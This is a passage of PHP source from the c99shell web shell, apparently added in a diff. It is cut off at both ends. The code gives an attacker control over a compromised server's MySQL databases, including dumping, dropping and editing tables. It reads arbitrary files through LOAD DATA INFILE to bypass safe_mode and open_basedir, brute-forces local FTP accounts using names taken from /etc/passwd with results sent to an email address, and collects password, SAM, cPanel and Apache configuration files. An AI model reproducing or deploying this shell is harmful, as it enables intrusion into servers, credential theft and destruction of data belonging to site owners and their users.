\";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; + echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; + echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; + echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; + echo "</form>"; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; + } + } + else {echo "<b>Dump: nothing to do!</b>";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "<br><br><b>Inserting row into table:</b><br>"; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; + $i++; + } + echo "</table><br>"; + echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; + if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} + echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "<hr size=\"1\" noshade>"; + echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} + else {echo "&nbsp;";} + } + if ($i == 0) {echo "empty";} + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>"; + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; + for ($i=0;$i<mysql_num_fields($result);$i++) + { + $v = mysql_field_name($result,$i); + if ($e[0] == "a") {$s = "d"; $m = "asc";} + else {$s = "a"; $m = "desc";} + echo "<td>"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} + else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} + echo "</td>"; + } + echo "<td><font color=\"green\"><b>Action</b></font></td>"; + echo "</tr>"; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo "<tr>"; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "<font color=\"green\">NULL</font>";} + echo "<td>".$v."</td>"; + $i++; + } + echo "<td>"; + echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; + echo "</td>"; + echo "</tr>"; + } + mysql_free_result($result); + echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"deleterow\">Delete</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; + echo "<td>".$row["Rows"]."</td>"; + echo "<td>".$row["Type"]."</td>"; + echo "<td>".$row["Create_time"]."</td>"; + echo "<td>".$row["Update_time"]."</td>"; + echo "<td>".$size."</td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; + echo "</tr>"; + $i++; + } + echo "<tr bgcolor=\"000000\">"; + echo "<td><center><b>»</b></center></td>"; + echo "<td><center><b>".$i." table(s)</b></center></td>"; + echo "<td><b>".$trows."</b></td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td><b>".view_size($tsize)."</b></td>"; + echo "<td></td>"; + echo "</tr>"; + echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"tbldrop\">Drop</option>"; + echo "<option value=\"tblempty\">Empty</option>"; + echo "<option value=\"tbldump\">Dump</option>"; + echo "<option value=\"tblcheck\">Check table</option>"; + echo "<option value=\"tbloptimize\">Optimize table</option>"; + echo "<option value=\"tblrepair\">Repair table</option>"; + echo "<option value=\"tblanalyze\">Analyze table</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } + if (!empty($sql_act)) + { + echo "<hr size=\"1\" noshade>"; + if ($sql_act == "newdb") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "<center><b>Server-status variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table></center>"; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "<center><b>Server variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "<center><b>Processes:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} + else + { + for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} + $f = ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} + if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} + else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "</td></tr></table>"; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; + } + echo "</table>"; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} + elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} + echo "<br><br>"; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "<b>Ftp Quick brute:</b><br>"; + if (!win) {echo "This functions not work in Windows!<br><br>";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} + else + { + echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "<b>*nix /etc/passwd:</b><br>"; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; + echo join(":",$uid)."<br>"; + } + $i++; + } + } + else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} + else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";} + } + if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} + if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= 